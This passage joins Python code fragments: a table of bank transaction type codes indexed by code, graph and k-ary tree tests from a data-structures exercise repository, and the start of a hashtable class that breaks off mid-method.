TypeCode('342', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Broker Deposit'),
TypeCode('343', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Broker Deposits – CHF'),
TypeCode('344', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Individual Back Value Credit'),
TypeCode('345', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Item in Brokers Deposit'),
TypeCode('346', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Sweep Interest Income'),
TypeCode('347', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Sweep Principal Sell'),
TypeCode('348', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Futures Credit'),
TypeCode('349', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Principal Payments Credit'),
TypeCode('350', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Investment Sold'),
TypeCode('351', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Individual Investment Sold'),
TypeCode('352', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Cash Center Credits'),
TypeCode('353', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Cash Center Credit'),
TypeCode('354', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Interest Credit'),
TypeCode('355', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Investment Interest'),
TypeCode('356', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Credit Adjustment'),
TypeCode('357', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Credit Adjustment'),
TypeCode('358', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'YTD Adjustment Credit'),
TypeCode('359', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Interest Adjustment Credit'),
TypeCode('360', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Credits Less Wire Transfer and '
'Returned Checks'),
TypeCode('361', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Grand Total Credits Less Grand Total Debits'),
TypeCode('362', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Correspondent Collection'),
TypeCode('363', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Correspondent Collection Adjustment'),
TypeCode('364', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Loan Participation'),
TypeCode('366', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Currency and Coin Deposited'),
TypeCode('367', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Food Stamp Letter'),
TypeCode('368', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Food Stamp Adjustment'),
TypeCode('369', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Clearing Settlement Credit'),
TypeCode('370', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Back Value Credits'),
TypeCode('372', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Back Value Adjustment'),
TypeCode('373', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Customer Payroll'),
TypeCode('374', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'FRB Statement Recap'),
TypeCode('376', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Savings Bond Letter or Adjustment'),
TypeCode('377', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Treasury Tax and Loan Credit'),
TypeCode('378', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Transfer of Treasury Credit'),
TypeCode('379', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'FRB Government Checks Cash Letter Credit'),
TypeCode('381', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'FRB Government Check Adjustment'),
TypeCode('382', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'FRB Postal Money Order Credit'),
TypeCode('383', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'FRB Postal Money Order Adjustment'),
TypeCode('384', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'FRB Cash Letter Auto Charge Credit'),
TypeCode('385', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Universal Credits'),
TypeCode('386', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'FRB Cash Letter Auto Charge Adjustment'),
TypeCode('387', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'FRB Fine-Sort Cash Letter Credit'),
TypeCode('388', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'FRB Fine-Sort Adjustment'),
TypeCode('389', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Freight Payment Credits'),
TypeCode('390', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Miscellaneous Credits'),
TypeCode('391', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Universal Credit'),
TypeCode('392', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Freight Payment Credit'),
TypeCode('393', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Itemized Credit Over $10,000'),
TypeCode('394', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Cumulative** Credits'),
TypeCode('395', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Check Reversal'),
TypeCode('397', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Float Adjustment'),
TypeCode('398', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Miscellaneous Fee Refund'),
TypeCode('399', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Miscellaneous Credit'),
TypeCode('400', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Debits'),
TypeCode('401', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Debit Amount MTD'),
TypeCode('402', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Number of Debits'),
TypeCode('403', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Today’s Total Debits'),
TypeCode('405', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Debit Less Wire Transfers and '
'ChargeBacks'),
TypeCode('406', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Debits not Detailed'),
TypeCode('408', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Float Adjustment'),
TypeCode('409', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Debit (Any Type)'),
TypeCode('410', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total YTD Adjustment'),
TypeCode('412', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Debits (Excluding Returned Items)'),
TypeCode('415', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Lockbox Debit'),
TypeCode('416', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Lockbox Debits'),
TypeCode('420', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'EDI Transaction Debits'),
TypeCode('421', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'EDI Transaction Debit'),
TypeCode('422', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'EDIBANX Settlement Debit'),
TypeCode('423', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'EDIBANX Return Item Debit'),
TypeCode('430', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Payable–Through Drafts'),
TypeCode('435', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Payable–Through Draft'),
TypeCode('445', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'ACH Concentration Debit'),
TypeCode('446', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total ACH Disbursement Funding Debits'),
TypeCode('447', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'ACH Disbursement Funding Debit'),
TypeCode('450', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total ACH Debits'),
TypeCode('451', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'ACH Debit Received'),
TypeCode('452', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Item in ACH Disbursement or Debit'),
TypeCode('455', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Preauthorized ACH Debit'),
TypeCode('459', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Real Time Payment (RTP) Debit Total'),
TypeCode('462', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Account Holder Initiated ACH Debit'),
TypeCode('463', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Corporate Trade Payment Debits'),
TypeCode('464', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Corporate Trade Payment Debit'),
TypeCode('465', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Corporate Trade Payment Settlement'),
TypeCode('466', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'ACH Settlement'),
TypeCode('467', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'ACH Settlement Debits'),
TypeCode('468', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'ACH Return Item or Adjustment Settlement'),
TypeCode('469', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Miscellaneous ACH Debit'),
TypeCode('470', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Check Paid'),
TypeCode('471', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Check Paid – Cumulative MTD'),
TypeCode('472', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Cumulative** Checks Paid'),
TypeCode('474', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Certified Check Debit'),
TypeCode('475', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Check Paid'),
TypeCode('476', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Federal Reserve Bank Letter Debit'),
TypeCode('477', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Bank Originated Debit'),
TypeCode('478', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'List Post Debits'),
TypeCode('479', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'List Post Debit'),
TypeCode('480', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Loan Payments'),
TypeCode('481', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Individual Loan Payment'),
TypeCode('482', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Bank-Originated Debits'),
TypeCode('484', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Draft'),
TypeCode('485', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'DTC Debit'),
TypeCode('486', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Cash Letter Debits'),
TypeCode('487', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Cash Letter Debit'),
TypeCode('489', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Cash Letter Adjustment'),
TypeCode('490', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Outgoing Money Transfers'),
TypeCode('491', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Individual Outgoing Internal Money Transfer'),
TypeCode('493', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Customer Terminal Initiated Money Transfer'),
TypeCode('495', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Outgoing Money Transfer'),
TypeCode('496', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Money Transfer Adjustment'),
TypeCode('498', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Compensation'),
TypeCode('500', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Automatic Transfer Debits'),
TypeCode('501', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Individual Automatic Transfer Debit'),
TypeCode('502', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Bond Operations Debit'),
TypeCode('505', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Book Transfer Debits'),
TypeCode('506', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Book Transfer Debit'),
TypeCode('507', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total International Money Transfer Debits'),
TypeCode('508', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Individual International Money Transfer Debits'),
TypeCode('510', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total International Debits'),
TypeCode('512', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Letter of Credit Debit'),
TypeCode('513', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Letter of Credit'),
TypeCode('514', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Foreign Exchange Debit'),
TypeCode('515', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Letters of Credit'),
TypeCode('516', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Foreign Remittance Debit'),
TypeCode('518', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Foreign Collection Debit'),
TypeCode('522', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Foreign Checks Paid'),
TypeCode('524', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Commission'),
TypeCode('526', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'International Money Market Trading'),
TypeCode('527', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Standing Order'),
TypeCode('529', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Miscellaneous International Debit'),
TypeCode('530', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Security Debits'),
TypeCode('531', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Securities Purchased'),
TypeCode('532', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Amount of Securities Purchased'),
TypeCode('533', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Security Collection Debit'),
TypeCode('534', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Miscellaneous Securities DB – FF'),
TypeCode('535', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Purchase of Equity Securities'),
TypeCode('536', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Miscellaneous Securities Debit – CHF'),
TypeCode('537', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Collection Debit'),
TypeCode('538', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Matured Repurchase Order'),
TypeCode('539', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Bankers’ Acceptances Debit'),
TypeCode('540', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Coupon Collection Debit'),
TypeCode('541', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Bankers’ Acceptances'),
TypeCode('542', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Purchase of Debt Securities'),
TypeCode('543', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Domestic Collection'),
TypeCode('544', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Interest/Matured Principal Payment'),
TypeCode('546', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Commercial Paper'),
TypeCode('547', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Capital Change'),
TypeCode('548', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Savings Bonds Sales Adjustment'),
TypeCode('549', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Miscellaneous Security Debit'),
TypeCode('550', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Deposited Items Returned'),
TypeCode('551', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Credit Reversals'),
TypeCode('552', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Credit Reversal'),
TypeCode('554', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Posting Error Correction Debit'),
TypeCode('555', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Deposited Item Returned'),
TypeCode('556', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total ACH Return Items'),
TypeCode('557', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Individual ACH Return Item'),
TypeCode('558', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'ACH Reversal Debit'),
TypeCode('560', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Rejected Debits'),
TypeCode('561', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Individual Rejected Debit'),
TypeCode('563', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Overdraft'),
TypeCode('564', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Overdraft Fee'),
TypeCode('566', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Return Item'),
TypeCode('567', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Return Item Fee'),
TypeCode('568', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Return Item Adjustment'),
TypeCode('570', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total ZBA Debits'),
TypeCode('574', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Cumulative ZBA Debits'),
TypeCode('575', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'ZBA Debit'),
TypeCode('577', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'ZBA Debit Transfer'),
TypeCode('578', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'ZBA Debit Adjustment'),
TypeCode('580', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Controlled Disbursing Debits'),
TypeCode('581', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Individual Controlled Disbursing Debit'),
TypeCode('583', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Disbursing Checks Paid – Early Amount'),
TypeCode('584', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Disbursing Checks Paid – Later Amount'),
TypeCode('585', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Disbursing Funding Requirement'),
TypeCode('586', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'FRB Presentment Estimate (Fed Estimate)'),
TypeCode('587', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Late Debits (After Notification)'),
TypeCode('588', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Disbursing Checks Paid – Last Amount'),
TypeCode('590', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total DTC Debits'),
TypeCode('594', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total ATM Debits'),
TypeCode('595', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'ATM Debit'),
TypeCode('596', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total ARP Debits'),
TypeCode('597', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'ARP Debit'),
TypeCode('601', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Estimated Total Disbursement'),
TypeCode('602', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Adjusted Total Disbursement'),
TypeCode('610', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Funds Required'),
TypeCode('611', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Wire Transfers Out- CHF'),
TypeCode('612', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Wire Transfers Out – FF'),
TypeCode('613', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total International Debit – CHF'),
TypeCode('614', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total International Debit – FF'),
TypeCode('615', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Federal Reserve Bank – '
'Commercial Bank Debit'),
TypeCode('616', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Federal Reserve Bank – Commercial Bank Debit'),
TypeCode('617', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Securities Purchased – CHF'),
TypeCode('618', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Securities Purchased – FF'),
TypeCode('621', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Broker Debits – CHF'),
TypeCode('622', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Broker Debit'),
TypeCode('623', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Broker Debits – FF'),
TypeCode('625', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Broker Debits'),
TypeCode('626', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Fed Funds Purchased'),
TypeCode('627', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Fed Funds Purchased'),
TypeCode('628', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Cash Center Debits'),
TypeCode('629', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Cash Center Debit'),
TypeCode('630', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Debit Adjustments'),
TypeCode('631', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Debit Adjustment'),
TypeCode('632', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Trust Debits'),
TypeCode('633', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Trust Debit'),
TypeCode('634', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'YTD Adjustment Debit'),
TypeCode('640', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Escrow Debits'),
TypeCode('641', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Individual Escrow Debit'),
TypeCode('644', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Individual Back Value Debit'),
TypeCode('646', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Transfer Calculation Debit'),
TypeCode('650', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Investments Purchased'),
TypeCode('651', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Individual Investment Purchased'),
TypeCode('654', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Interest Debit'),
TypeCode('655', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Investment Interest Debits'),
TypeCode('656', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Sweep Principal Buy'),
TypeCode('657', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Futures Debit'),
TypeCode('658', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Principal Payments Debit'),
TypeCode('659', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Interest Adjustment Debit'),
TypeCode('661', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Account Analysis Fee'),
TypeCode('662', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Correspondent Collection Debit'),
TypeCode('663', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Correspondent Collection Adjustment'),
TypeCode('664', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Loan Participation'),
TypeCode('665', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Intercept Debits'),
TypeCode('666', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Currency and Coin Shipped'),
TypeCode('667', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Food Stamp Letter'),
TypeCode('668', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Food Stamp Adjustment'),
TypeCode('669', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Clearing Settlement Debit'),
TypeCode('670', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Back Value Debits'),
TypeCode('672', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Back Value Adjustment'),
TypeCode('673', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Customer Payroll'),
TypeCode('674', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'FRB Statement Recap'),
TypeCode('676', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Savings Bond Letter or Adjustment'),
TypeCode('677', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Treasury Tax and Loan Debit'),
TypeCode('678', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Transfer of Treasury Debit'),
TypeCode('679', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'FRB Government Checks Cash Letter Debit'),
TypeCode('681', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'FRB Government Check Adjustment'),
TypeCode('682', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'FRB Postal Money Order Debit'),
TypeCode('683', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'FRB Postal Money Order Adjustment'),
TypeCode('684', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'FRB Cash Letter Auto Charge Debit'),
TypeCode('685', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Universal Debits'),
TypeCode('686', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'FRB Cash Letter Auto Charge Adjustment'),
TypeCode('687', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'FRB Fine-Sort Cash Letter Debit'),
TypeCode('688', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'FRB Fine-Sort Adjustment'),
TypeCode('689', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'FRB Freight Payment Debits'),
TypeCode('690', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Miscellaneous Debits'),
TypeCode('691', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Universal Debit'),
TypeCode('692', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Freight Payment Debit'),
TypeCode('693', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Itemized Debit Over $10,000'),
TypeCode('694', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Deposit Reversal'),
TypeCode('695', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Deposit Correction Debit'),
TypeCode('696', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Regular Collection Debit'),
TypeCode('697', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Cumulative Debits'),
TypeCode('698', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Miscellaneous Fees'),
TypeCode('699', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Miscellaneous Debit'),
TypeCode('701', None, TypeCodeLevel.status, 'Principal Loan Balance'),
TypeCode('703', None, TypeCodeLevel.status, 'Available Commitment Amount'),
TypeCode('705', None, TypeCodeLevel.status, 'Payment Amount Due'),
TypeCode('707', None, TypeCodeLevel.status, 'Principal Amount Past Due'),
TypeCode('709', None, TypeCodeLevel.status, 'Interest Amount Past Due'),
TypeCode('720', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Loan Payment'),
TypeCode('721', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Amount Applied to Interest'),
TypeCode('722', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Amount Applied to Principal'),
TypeCode('723', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Amount Applied to Escrow'),
TypeCode('724', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Amount Applied to Late Charges'),
TypeCode('725', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Amount Applied to Buydown'),
TypeCode('726', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Amount Applied to Misc. Fees'),
TypeCode('727', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Amount Applied to Deferred Interest Detail'),
TypeCode('728', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Amount Applied to Service Charge'),
TypeCode('760', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Loan Disbursement'),
TypeCode('890', TypeCodeTransaction.misc, TypeCodeLevel.detail, 'Contains Non-monetary Information'),
]
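# Index the list by its three-digit code so records can be looked up in O(1),
# e.g. TypeCodes['699'] returns the 'Miscellaneous Debit' entry.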
TypeCodes = {
type_code.code: type_code
for type_code in TypeCodes
}
|
everydaytimmy/data-structures-and-algorithms | python/tests/test_fizzbuzz_tree.py | <filename>python/tests/test_fizzbuzz_tree.py<gh_stars>0
from code_challenges.fizzbuzz_tree.fizzbuzz_tree import Ktree, Node, fizz_buzz
# def test_node_has_value():
# node = Node("apple")
# assert node.value == "apple"
# def test_create_k_tree():
# tree = Ktree()
# assert tree
# def test_fizz_buzz():
# one = Node(1)
# two = Node(2)
# three = Node(3)
# four = Node(4)
# five = Node(5)
# six = Node(6)
# seven = Node(7)
# eight = Node(8)
# one.children = [two,five]
# two.children = [three, four]
# five.children = [six, seven, eight]
# kt = Ktree()
# kt.root = one
# actual = fizz_buzz(kt)
# expected = kt.breadth(kt)
# assert actual == expected
|
everydaytimmy/data-structures-and-algorithms | python/tests/test_business_trip.py | from code_challenges.graph_business_trip.graph_business_trip import business_trip
from code_challenges.graph.graph import Graph, Vertex
def test_business_one():
graph = Graph('bidirectional')
boston = graph.add_node('Boston')
seattle = graph.add_node('Seattle')
la = graph.add_node('LA')
sf = graph.add_node('SF')
chi = graph.add_node('CHI')
ny = graph.add_node('NY')
graph.add_edge(boston, ny, 82)
graph.add_edge(boston, chi, 90)
graph.add_edge(ny, chi, 42)
graph.add_edge(ny, seattle, 200)
graph.add_edge(ny, la, 225)
graph.add_edge(ny, sf, 230)
graph.add_edge(chi, seattle, 175)
graph.add_edge(seattle, sf, 85)
graph.add_edge(sf, la, 85)
cities = [boston, ny,la]
actual = business_trip(graph, cities)
expected = (True, 307)
assert actual == expected
def test_business_two():
graph = Graph('bidirectional')
pandora = graph.add_node('Pandora')
arendelle = graph.add_node('Arendelle')
metroville = graph.add_node('Metroville')
monstroplolis = graph.add_node('Monstroplolis')
narnia = graph.add_node('Narnia')
naboo = graph.add_node('Naboo')
graph.add_edge(pandora, arendelle, 150)
graph.add_edge(pandora, metroville, 82)
graph.add_edge(arendelle, metroville, 99)
graph.add_edge(arendelle, monstroplolis, 42)
graph.add_edge(metroville, monstroplolis, 105)
graph.add_edge(metroville, narnia, 37)
graph.add_edge(metroville, naboo, 26)
graph.add_edge(naboo, narnia, 250)
graph.add_edge(monstroplolis, naboo, 73)
cities = [narnia, arendelle, naboo]
actual = business_trip(graph, cities)
expected = (False, 0)
assert actual == expected
|
everydaytimmy/data-structures-and-algorithms | python/code_challenges/hashtable/hashtable.py | from code_challenges.linked_list.linked_list import LinkedList, Node
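# Hashtable with separate chaining: each bucket holds a LinkedList of [key, value] pairs.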
class Hashtable:
def __init__(self, size=1024):
self.size = size
self._bucket = [None] * size
def add(self, key, value):
index = self.hash(key)
if not self._bucket[index]:
